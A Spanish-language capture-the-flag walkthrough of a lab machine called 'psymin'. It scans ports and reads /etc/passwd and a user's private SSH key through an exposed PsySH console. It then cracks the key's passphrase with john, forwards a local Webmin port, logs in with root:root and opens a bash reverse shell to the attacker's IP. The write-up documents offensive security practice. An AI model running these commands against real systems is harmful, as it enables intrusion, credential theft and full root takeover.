Enumeramos puertos:
❯ sudo nmap -p- -sS --min-rate 5000 -n -Pn -oG 01-allPorts 192.168.1.96❯ nmap -sCV -p 22,80,3000 -oN 02-targeted.txt 192.168.1.96
Starting Nmap 7.95 ( https://nmap.org ) at 2025-02-13 16:38 -03
Nmap scan report for 192.168.1.96
Host is up (0.00028s latency).
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 9.2p1 Debian 2+deb12u3 (protocol 2.0)
| ssh-hostkey:
| 256 a9:a8:52:f3:cd:ec:0d:5b:5f:f3:af:5b:3c:db:76:b6 (ECDSA)
|_ 256 73:f5:8e:44:0c:b9:0a:e0:e7:31:0c:04:ac:7e:ff:fd (ED25519)
80/tcp open http nginx 1.22.1
|_http-server-header: nginx/1.22.1
|_http-title: Welcome to nginx!
3000/tcp open ppp?
| fingerprint-strings:
| GenericLines, NULL:
| Psy Shell v0.12.4 (PHP 8.2.20
| cli) by Justin Hileman
| version is available at psysh.org/psysh (current: v0.12.4, latest: v0.12.7)
| GetRequest:
| GET / HTTP/1.0
| Shell v0.12.4 (PHP 8.2.20
| cli) by Justin Hileman
| version is available at psysh.org/psysh (current: v0.12.4, latest: v0.12.7)
| HTTP/1.0
| Error Undefined constant "GET".
| HTTPOptions:
| OPTIONS / HTTP/1.0
| Shell v0.12.4 (PHP 8.2.20
| cli) by Justin Hileman
| version is available at psysh.org/psysh (current: v0.12.4, latest: v0.12.7)
| OPTIONS / HTTP/1.0
| Error Undefined constant "OPTIONS".
| Help:
| HELP
| Shell v0.12.4 (PHP 8.2.20
| cli) by Justin Hileman
| version is available at psysh.org/psysh (current: v0.12.4, latest: v0.12.7)
| HELP
| Error Undefined constant "HELP".
| NCP:
| DmdT^@^@^@
| ^@^@^@^A^@^@^@^@
| RTSPRequest:
| OPTIONS / RTSP/1.0
| Shell v0.12.4 (PHP 8.2.20
| cli) by Justin Hileman
| version is available at psysh.org/psysh (current: v0.12.4, latest: v0.12.7)
| OPTIONS / RTSP/1.0
|_ Error Undefined constant "OPTIONS".
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
SF-Port3000-TCP:V=7.95%I=7%D=2/13%Time=67AE4A52%P=x86_64-pc-linux-gnu%r(NU
SF:LL,8D,"Psy\x20Shell\x20v0\.12\.4\x20\(PHP\x208\.2\.20\x20\xe2\x80\x94\x
SF:20cli\)\x20by\x20Justin\x20Hileman\r\nNew\x20version\x20is\x20available
SF:\x20at\x20psysh\.org/psysh\x20\(current:\x20v0\.12\.4,\x20latest:\x20v0
SF:\.12\.7\)\r\n>\x20")%r(GenericLines,9D,"Psy\x20Shell\x20v0\.12\.4\x20\(
SF:PHP\x208\.2\.20\x20\xe2\x80\x94\x20cli\)\x20by\x20Justin\x20Hileman\r\n
SF:New\x20version\x20is\x20available\x20at\x20psysh\.org/psysh\x20\(curren
SF:t:\x20v0\.12\.4,\x20latest:\x20v0\.12\.7\)\r\n>\x20\r\n>\x20\r\n>\x20\r
SF:\n>\x20\r\n>\x20")%r(GetRequest,EA,"GET\x20/\x20HTTP/1\.0\r\n\r\n\r\n\r
SF:\nPsy\x20Shell\x20v0\.12\.4\x20\(PHP\x208\.2\.20\x20\xe2\x80\x94\x20cli
SF:\)\x20by\x20Justin\x20Hileman\r\nNew\x20version\x20is\x20available\x20a
SF:t\x20psysh\.org/psysh\x20\(current:\x20v0\.12\.4,\x20latest:\x20v0\.12\
SF:.7\)\r\n>\x20GET\x20/\x20HTTP/1\.0\r\n\r\n\x20\x20\x20Error\x20\x20Unde
SF:fined\x20constant\x20\"GET\"\.\r\n\r\n>\x20\r\n>\x20\r\n>\x20\r\n>\x20"
SF:)%r(Help,CB,"HELP\r\n\r\nPsy\x20Shell\x20v0\.12\.4\x20\(PHP\x208\.2\.20
SF:\x20\xe2\x80\x94\x20cli\)\x20by\x20Justin\x20Hileman\r\nNew\x20version\
SF:x20is\x20available\x20at\x20psysh\.org/psysh\x20\(current:\x20v0\.12\.4
SF:,\x20latest:\x20v0\.12\.7\)\r\n>\x20HELP\r\n\r\n\x20\x20\x20Error\x20\x
SF:20Undefined\x20constant\x20\"HELP\"\.\r\n\r\n>\x20\r\n>\x20")%r(NCP,38,
SF:"DmdT\^@\^@\^@\x08\x20\x08\x08\x20\x08\x08\x20\x08\x08\x20\x08\x08\x20\
SF:x08\x08\x20\x08\x08\x20\x08\x08\x20\x08\x08\x20\x08\x08\x20\x08\^@\^@\^
SF:@\^A\^@\^@\^@\^@")%r(HTTPOptions,F6,"OPTIONS\x20/\x20HTTP/1\.0\r\n\r\n\
SF:r\n\r\nPsy\x20Shell\x20v0\.12\.4\x20\(PHP\x208\.2\.20\x20\xe2\x80\x94\x
SF:20cli\)\x20by\x20Justin\x20Hileman\r\nNew\x20version\x20is\x20available
SF:\x20at\x20psysh\.org/psysh\x20\(current:\x20v0\.12\.4,\x20latest:\x20v0
SF:\.12\.7\)\r\n>\x20OPTIONS\x20/\x20HTTP/1\.0\r\n\r\n\x20\x20\x20Error\x2
SF:0\x20Undefined\x20constant\x20\"OPTIONS\"\.\r\n\r\n>\x20\r\n>\x20\r\n>\
SF:x20\r\n>\x20")%r(RTSPRequest,F6,"OPTIONS\x20/\x20RTSP/1\.0\r\n\r\n\r\n\
SF:r\nPsy\x20Shell\x20v0\.12\.4\x20\(PHP\x208\.2\.20\x20\xe2\x80\x94\x20cl
SF:i\)\x20by\x20Justin\x20Hileman\r\nNew\x20version\x20is\x20available\x20
SF:at\x20psysh\.org/psysh\x20\(current:\x20v0\.12\.4,\x20latest:\x20v0\.12
SF:\.7\)\r\n>\x20OPTIONS\x20/\x20RTSP/1\.0\r\n\r\n\x20\x20\x20Error\x20\x2
SF:0Undefined\x20constant\x20\"OPTIONS\"\.\r\n\r\n>\x20\r\n>\x20\r\n>\x20\
SF:r\n>\x20");
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 152.92 secondsEl puerto 3000 expone una PsySH (consola interactiva de PHP). Nos conectamos:
❯ nc 192.168.1.96 3000
Psy Shell v0.12.4 (PHP 8.2.20 — cli) by Justin Hileman
New version is available at psysh.org/psysh (current: v0.12.4, latest: v0.12.7)
>Comprobamos las funciones deshabilitadas, que incluyen las de ejecución de comandos:
> ini_get('disable_functions');
ini_get('disable_functions');
WARNING: terminal is not fully functional
Press RETURN to continue
= "exec,passthru,shell_exec,system,popen,curl_exec,curl_multi_exec,parse_ini_fil
e,show_source,phpinfo"No podemos ejecutar comandos, pero sí leer archivos. Identificamos al usuario alfred en /etc/passwd y extraemos su clave SSH:
> file_get_contents('/etc/passwd');
...
root:x:0:0:root:/root:/bin/bash
alfred:x:1000:1000:alfred:/home/alfred:/bin/bash
...
> file_get_contents('/home/alfred/.ssh/id_rsa')
file_get_contents('/home/alfred/.ssh/id_rsa')
WARNING: terminal is not fully functional
Press RETURN to continue
= """
-----BEGIN OPENSSH PRIVATE KEY-----\n
...
-----END OPENSSH PRIVATE KEY-----\nCrackeamos la passphrase con john y nos conectamos como alfred, obteniendo la primera flag:
❯ ssh2john.py id_rsa_alfred > hash
❯ john -w=/home/wh01s17/Documentos/wordlists/rockyou.txt hash
...
alfredo (id_rsa_alfred)
...
❯ ssh alfred@192.168.1.96 -i id_rsa_alfred
Enter passphrase for key 'id_rsa_alfred': alfredo
alfred@psymin:~$Para escalar privilegios, listamos los puertos en escucha local y encontramos un servicio en el 10000:
alfred@psymin:~$ ss -tuln
...
tcp LISTEN 0 4096 127.0.0.1:10000 0.0.0.0:*
...Es una instancia de Webmin que solo escucha localmente, así que reconectamos por SSH haciendo port forwarding del puerto 10000:
alfred@psymin:~$ curl http://127.0.0.1:10000
...
<title>Login to Webmin</title>
...
❯ sudo ssh -L 1000:127.0.0.1:10000 -i id_rsa_alfred alfred@192.168.1.96
Enter passphrase for key 'id_rsa_alfred': alfredo
alfred@psymin:~$Accedemos a http://127.0.0.1:1000/ con las credenciales root:root. Una vez dentro, usamos la consola de comandos de Webmin (que se ejecuta como root) para lanzar una reverse shell:
en la web: root@psymin:~# bash -i >& /dev/tcp/192.168.1.7/1234 0>&1
❯ ncat -nlvp 1234
Ncat: Version 7.95 ( https://nmap.org/ncat )
Ncat: Listening on [::]:1234
Ncat: Listening on 0.0.0.0:1234
Ncat: Connection from 192.168.1.96:36164.
root@psymin:~#Obtenemos la flag y fin.